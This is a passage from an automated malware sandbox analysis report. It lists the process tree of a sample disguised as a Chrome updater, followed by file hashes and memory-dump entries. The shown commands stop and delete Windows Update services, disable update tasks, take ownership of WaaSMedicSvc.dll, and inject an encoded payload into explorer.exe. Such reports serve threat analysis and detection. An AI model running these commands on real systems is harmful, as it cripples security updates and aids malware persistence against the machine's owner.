HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
-
C:\Windows\system32\sc.exesc stop bits4⤵
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe3⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "wknkxnouyh"4⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe fffmrxkhevshsdek0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRha9S4YJkR8/KlqFio/vzAY7y//ZROYnArPXLiffwPB6PB4TwHRdp5kOUybEcdYHFAhdUtiJ4KO+eYtq99cAs745QzaReMwKP0mBN9oMgdGhbI95+lAZBArBG1zgJG5b4GWFxfPtcy6WibtQFHOO2LexogLgCFNuU5CfXb28u22O7RtF8L1LLcQ11YdQfCpDvwswZSKmpzevICegb9KLIb3BMZYsJxOjUu7n990KBMZSyacB1V6bp6H6KpdSvkmxbcR2MioAEmbhhvA0Uadya6OEWZ3XLzaEiN12Iih4TE1mSJoZzt/auX1Ah8NcTZE/cyzd6u6Ke9xMHhy3B6Do54G9zHxCyzsFTagYSi2oNtHSwUHyLAZuA1VH0i89Htg+I+1qNuZcSQa52vl/B1NwmuGJ8bSYQ1Y84EKkpWNeAYba5l4yK+VXH9FKP0fJCGCyHnsBdn/mdlNErmLlJMZU68eyziKpgrg+yoyvbBkxzCN9LsvaewiEOrRVZ+MaTIxwc7gja3bR6jqBMbKRYvC72G3⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Chrome\updater.exeFilesize
4.1MB
MD5c1fd183c8ef30db8e2be4ab51e42501f
SHA167a5ba161cafa7f0471f03968dd0f94cfb21aa1a
SHA256003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33
SHA5128b3060ae4c8e8e7f376ed40ac9741206f9d82f3185571a4edd2be05de5240ae743356cd498a842f58f969286e80014ecae29423a618b520d97cedc5a01ddc2f0
-
C:\Program Files\Chrome\updater.exeFilesize
4.1MB
MD5c1fd183c8ef30db8e2be4ab51e42501f
SHA167a5ba161cafa7f0471f03968dd0f94cfb21aa1a
SHA256003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33
SHA5128b3060ae4c8e8e7f376ed40ac9741206f9d82f3185571a4edd2be05de5240ae743356cd498a842f58f969286e80014ecae29423a618b520d97cedc5a01ddc2f0
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.logFilesize
539B
MD584f2160705ac9a032c002f966498ef74
SHA1e9f3db2e1ad24a4f7e5c203af03bbc07235e704c
SHA2567840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93
SHA512f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57
-
memory/356-364-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/356-370-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/356-365-0x0000000000401BEA-mapping.dmp
-
memory/976-373-0x00000205AC870000-0x00000205AC882000-memory.dmpFilesize
72KB
-
memory/976-360-0x00000205AC700000-0x00000205AC706000-memory.dmpFilesize
24KB
-
memory/1260-169-0x0000000000000000-mapping.dmp
-
memory/1580-385-0x0000000000000000-mapping.dmp
-
memory/1580-175-0x0000000000000000-mapping.dmp
-
memory/1716-182-0x0000000000000000-mapping.dmp
-
memory/1840-262-0x00000240EC860000-0x00000240EC86A000-memory.dmpFilesize
40KB
-
memory/1840-223-0x00000240EC840000-0x00000240EC85C000-memory.dmpFilesize
112KB
-
memory/1840-208-0x0000000000000000-mapping.dmp
-
memory/1840-229-0x00000240ECEC0000-0x00000240ECF79000-memory.dmpFilesize
740KB
-
memory/2032-170-0x0000000000000000-mapping.dmp
-
memory/2084-191-0x0000000000000000-mapping.dmp
-
memory/2132-121-0x0000020831630000-0x0000020831A4A000-memory.dmpFilesize
4.1MB
-
memory/2132-129-0x0000020816540000-0x000002081695B000-memory.dmpFilesize
4.1MB
-
memory/2168-359-0x0000000000000000-mapping.dmp
-
memory/2240-379-0x0000000000000000-mapping.dmp
-
memory/2376-353-0x0000000000000000-mapping.dmp
-
memory/2688-128-0x0000000000000000-mapping.dmp
-
memory/2700-375-0x0000000000000000-mapping.dmp
-
memory/2796-171-0x0000000000000000-mapping.dmp
-
memory/2948-172-0x0000000000000000-mapping.dmp
-
memory/2948-382-0x0000000000000000-mapping.dmp
-
memory/2952-380-0x0000000000000000-mapping.dmp
-
memory/3032-190-0x0000000000000000-mapping.dmp
-
memory/3192-192-0x0000000000000000-mapping.dmp
-
memory/3468-401-0x000001F573310000-0x000001F573316000-memory.dmpFilesize
24KB
-
memory/3468-178-0x0000000000000000-mapping.dmp
-
memory/3468-404-0x000001F572BF0000-0x000001F572BF7000-memory.dmpFilesize
28KB
-
memory/3496-130-0x0000000000000000-mapping.dmp
-
memory/3496-135-0x00000205FB9B0000-0x00000205FB9D2000-memory.dmpFilesize
136KB
-
memory/3496-138-0x00000205FBB60000-0x00000205FBBD6000-memory.dmpFilesize
472KB
-
memory/3520-179-0x0000000000000000-mapping.dmp
-
memory/3780-189-0x0000000000000000-mapping.dmp
-
memory/3784-188-0x0000000000000000-mapping.dmp
-
memory/3808-366-0x0000000000000000-mapping.dmp
-
memory/3912-186-0x0000000000000000-mapping.dmp
-
memory/3944-185-0x0000000000000000-mapping.dmp
-
memory/4100-177-0x0000000000000000-mapping.dmp
-
memory/4132-181-0x0000000000000000-mapping.dmp
-
memory/4148-207-0x0000000000000000-mapping.dmp
-
memory/4160-355-0x0000000000000000-mapping.dmp
-
memory/4224-187-0x0000000000000000-mapping.dmp
-
memory/4280-194-0x0000000000000000-mapping.dmp
-
memory/4372-358-0x0000000000000000-mapping.dmp
-
memory/4400-357-0x0000000000000000-mapping.dmp
-
memory/4412-356-0x0000000000000000-mapping.dmp
-
memory/4532-354-0x0000000000000000-mapping.dmp
-
memory/4556-363-0x0000000000000000-mapping.dmp
-
memory/4584-371-0x0000000000000000-mapping.dmp
-
memory/4592-361-0x0000000000000000-mapping.dmp
-
memory/4600-362-0x0000000000000000-mapping.dmp
-
memory/4608-184-0x0000000000000000-mapping.dmp
-
memory/4628-183-0x0000000000000000-mapping.dmp
-
memory/4848-180-0x0000000000000000-mapping.dmp
-
memory/4864-378-0x0000000000000000-mapping.dmp
-
memory/4864-168-0x0000000000000000-mapping.dmp
-
memory/4896-372-0x0000000000000000-mapping.dmp
-
memory/4928-381-0x0000000000000000-mapping.dmp
-
memory/4944-376-0x0000000000000000-mapping.dmp
-
memory/4948-166-0x0000000000000000-mapping.dmp
-
memory/4960-173-0x0000000000000000-mapping.dmp
-
memory/4960-383-0x0000000000000000-mapping.dmp
-
memory/4988-384-0x0000000000000000-mapping.dmp
-
memory/4988-174-0x0000000000000000-mapping.dmp
-
memory/5020-377-0x0000000000000000-mapping.dmp
-
memory/5028-167-0x0000000000000000-mapping.dmp
-
memory/5112-176-0x0000000000000000-mapping.dmp
-
memory/5116-390-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/5116-391-0x0000000000410000-0x0000000000430000-memory.dmpFilesize
128KB
-
memory/5116-392-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/5116-395-0x0000000000000000-0x0000000001000000-memory.dmpFilesize
16.0MB
-
memory/5116-389-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/5116-386-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/5116-387-0x000000014036DB84-mapping.dmp